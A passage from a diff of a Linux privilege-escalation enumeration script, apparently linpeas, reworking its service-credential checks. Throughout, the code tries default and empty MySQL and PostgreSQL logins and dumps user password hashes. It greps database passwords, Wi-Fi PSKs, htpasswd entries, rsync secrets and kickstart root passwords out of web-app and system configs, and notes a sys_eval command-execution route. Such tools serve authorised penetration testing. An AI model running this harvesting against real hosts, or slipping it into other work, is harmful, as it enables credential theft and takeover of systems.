--version 2>/dev/null || echo_not_found "mysql" echo "" #-- SI) Mysql connection root/root - printf $Y"[+] "$GREEN"MySQL connection using default root/root ........... "$NC + print_list "MySQL connection using default root/root ........... " mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi #-- SI) Mysql connection root/toor - printf $Y"[+] "$GREEN"MySQL connection using root/toor ................... "$NC + print_list "MySQL connection using root/toor ................... " mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi #-- SI) Mysql connection root/NOPASS mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` - printf $Y"[+] "$GREEN"MySQL connection using root/NOPASS ................. "$NC + print_list "MySQL connection using root/NOPASS ................. " if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi #-- SI) Mysql credentials - printf $Y"[+] "$GREEN"Searching mysql credentials and exec\n"$NC - mysqldirs=$(echo "$FIND_DIR_ETC\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_MNT" | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -v "mysql/mysql") - if [ "$mysqldirs" ]; then - printf "%s\n" "$mysqldirs" | while read d; do + print_2title "Searching mysql credentials and exec" + if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do for f in `find $d -name debian.cnf 2>/dev/null`; do - if [ -r $f ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + if [ -r $f ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," cat "$f" fi done for f in `find $d -name user.MYD 2>/dev/null`; do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" fi done for f in `grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"`; do if [ -r "$f" ]; then u=`cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null` - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," fi done for f in `find $d -name my.cnf 2>/dev/null`; do - if [ -r "$f" ]; then + if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed "s,password.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," fi done mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"` - if [ "$mysqlexec" ]; then + if [ "$mysqlexec" ]; then echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," fi done else echo_not_found fi echo "" - #-- SI) PostgreSQL info - printf $Y"[+] "$GREEN"PostgreSQL version and pgadmin credentials\n"$NC - postgver=`psql -V 2>/dev/null` - postgdb=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pgadmin.*\.db$') - postgconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$') - if [ "$postgver" ] || [ "$postgdb" ] || [ "$postgconfs" ]; then - if [ "$postgver" ]; then echo "Version: $postgver"; fi - if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - printf "%s\n" "$postgconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${C}[1;31m&${C}[0m," 2>/dev/null - echo "" - fi - done - else echo_not_found - fi - echo "" + print_2title "Analizing PostgreSQL Files (limit 70)" + echo "Version: $(warn_exec psql -V 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then echo_not_found "postgresql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + #-- SI) PostgreSQL brute if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using postgres/NOPASS ........ "$NC - if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi - printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using postgres/NOPASS ........ "$NC - if [ "`timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.)*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "`timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," else echo_no fi - printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi - printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" fi - #-- SI) Apache info - printf $Y"[+] "$GREEN"Apache server info\n"$NC - apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` - if [ "$apachever" ]; then - echo "Version: $apachever" - sitesenabled=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep "sites-enabled") - printf "%s\n" "$sitesenabled" | while read d; do for f in "$d/*"; do grep "AuthType\|AuthName\|AuthUserFile\|ServerName\|ServerAlias" $f 2>/dev/null | grep -v "#" | sed "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done; done - if [ !"$sitesenabled" ]; then - default00=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep "000-default") - printf "%s\n" "$default00" | while read f; do grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" "$f" 2>/dev/null | grep -v "#" | sed -${E} "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done - fi - echo "PHP exec extensions" + print_2title "Analizing Mongo Files (limit 70)" + echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; + + + print_2title "Analizing Apache Files (limit 70)" + echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" + print_3title 'PHP exec extensions' grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null - else echo_not_found - fi - echo "" + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then echo_not_found "sites-enabled"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "^#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default$\"`" ]; then echo_not_found "000-default"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; - #-- SI) PHP cookies files - phpsess1=`ls /var/lib/php/sessions 2>/dev/null` - phpsess2=$(echo "$FIND_TMP\n$FIND_VAR\n$FIND_MNT" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*') - printf $Y"[+] "$GREEN"Searching PHPCookies\n"$NC - if [ "$phpsess1" ] || [ "$phpsess2" ]; then - if [ "$phpsess1" ]; then ls /var/lib/php/sessions 2>/dev/null; fi - if [ "$phpsess2" ]; then $(echo "$FIND_TMP $FIND_VAR" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*'); fi - else echo_not_found - fi - echo "" - #-- SI) Wordpress user, password, databname and host - printf $Y"[+] "$GREEN"Searching Wordpress wp-config.php files\n"$NC - wp=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'wp-config\.php$') - if [ "$wp" ]; then - printf "$wp\n" | while read f; do echo "$f"; grep -E "PASSWORD|USER|NAME|HOST" "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; echo ""; done - else echo_not_found "wp-config.php" - fi - echo "" + print_2title "Analizing Tomcat Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - #-- SI) Drupal user, password, databname and host - printf $Y"[+] "$GREEN"Searching Drupal settings.php files\n"$NC - drup=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'settings\.php$') - if [ "$drup" ]; then - printf "%s\n" "$drup" | while read f; do - if [ "`echo $f | grep '/default/settings.php'`" ]; then #Check path /default/settings.php - printf "Drupal settings.php file found: $f\n" - grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; - echo "" - fi - done - else echo_not_found "/default/settings.php" - fi - echo "" + + print_2title "Analizing FastCGI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - #-- SI) Moodle user, password, databname and host - printf $Y"[+] "$GREEN"Searching Moodle config.php files\n"$NC - moo=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'config\.php$') - if [ "$moo" ]; then - printf "%s\n" "$moo" | while read f; do - if [ "`echo $f | grep -i moodle/config.php`" ]; then - printf "Moodle config.php file found: $f\n" - grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; - fi - done - else echo_not_found "config.php inside a moodle folder" - fi - echo "" - #-- SI) Tomcat users - printf $Y"[+] "$GREEN"Searching Tomcat users file\n"$NC - tomcat=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'tomcat-users\.xml$') - if [ "$tomcat" ]; then - echo "tomcat-users.xml file found: $tomcat" - printf "%s\n" "$tomcat" | while read f; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found "tomcat-users.xml" - fi - echo "" + print_2title "Analizing Http conf Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - #-- SI) Mongo Information - printf $Y"[+] "$GREEN"Mongo information\n"$NC - mongos=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mongod.*\.conf$') - (mongo --version 2>/dev/null || mongod --version 2>/dev/null) || echo_not_found "mongo binary" - printf "%s\n" "$mongos" | while read f; do - if [ "$f" ]; then - echo "Found $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth*=*true|pass.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - #TODO: Check if you can login without password and warn the user - echo "" + print_2title "Analizing Htpasswd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - #-- SI) Supervisord conf file - printf $Y"[+] "$GREEN"Searching supervisord configuration file\n"$NC - supervisorf=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'supervisord\.conf') - if [ "$supervisorf" ]; then - printf "%s\n" "$supervisorf" | while read f; do - echo "Found $f"; - cat "$f" 2>/dev/null | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port|username|password,${C}[1;31m&${C}[0m,"; - done - else echo_not_found "supervisord.conf" - fi - echo "" - #-- SI) Cesi conf file - cesi=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cesi\.conf') - printf $Y"[+] "$GREEN"Searching cesi configuration file\n"$NC - if [ "$cesi" ]; then - printf "$cesi\n" - printf "%s\n" "$cesi" | while read f; do cat "$f" 2>/dev/null | grep "username.*=\|password.*=\|host.*=\|port.*=\|database.*=" | sed -${E} "s,username|password|database,${C}[1;31m&${C}[0m,"; done - else echo_not_found "cesi.conf" - fi - echo "" + print_2title "Analizing PHPCookies Files (limit 70)" + ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions + if ! [ "`echo \"$PSTORAGE_PHPCOOKIES\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHPCOOKIES" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - #-- SI) Rsyncd conf file - rsyncd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'rsyncd\.conf|rsyncd\.secrets') - printf $Y"[+] "$GREEN"Searching Rsyncd config file\n"$NC - if [ "$rsyncd" ]; then - printf "%s\n" "$rsyncd" | while read f; do - printf "$f\n" - if [ `echo "$f" | grep -i "secrets"` ]; then - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - else - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m," - fi - echo "" - done - else echo_not_found "rsyncd.conf" - fi - #-- SI) Hostapd conf file - printf $Y"[+] "$GREEN"Searching Hostapd config file\n"$NC - hostapd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'hostapd\.conf') - if [ "$hostapd" ]; then - printf $Y"[+] "$GREEN"Hostapd conf was found\n"$NC - printf "$hostapd\n" - printf "%s\n" "$hostapd" | while read f; do cat "$f" 2>/dev/null | grep "passphrase" | sed "s,passphrase.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found "hostapd.conf" - fi - echo "" + print_2title "Analizing Wordpress Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Drupal Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Moodle Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Supervisord Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Cesi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Rsync Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Hostapd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; + #-- SI) Wifi conns - printf $Y"[+] "$GREEN"Searching wifi conns file\n"$NC + print_2title "Searching wifi conns file" wifi=`find /etc/NetworkManager/system-connections/ -type f 2>/dev/null` if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${C}[1;31m&${C}[0m,"; done + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done else echo_not_found fi echo "" - #-- SI) Anaconda-ks conf files - printf $Y"[+] "$GREEN"Searching Anaconda-ks config files\n"$NC - anaconda=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'anaconda-ks\.cfg') - if [ "$anaconda" ]; then - printf "$anaconda\n" - printf "%s\n" "$anaconda" | while read f; do cat "$f" 2>/dev/null | grep "rootpw" | sed "s,rootpw.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found "anaconda-ks.cfg" - fi - echo "" + print_2title "Analizing Anaconda-ks Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - #-- SI) VNC files - printf $Y"[+] "$GREEN"Searching .vnc directories and their passwd files\n"$NC - vnc=$(echo "$FIND_DIR_HOME\n$FIND_DIR_USERS\n$FIND_DIR_MNT" | grep -E '\.vnc') - if [ "$vnc" ]; then - printf "$vnc\n" - printf "%s\n" "$vnc" | while read d; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done - else echo_not_found ".vnc" - fi - echo "" - #-- SI) 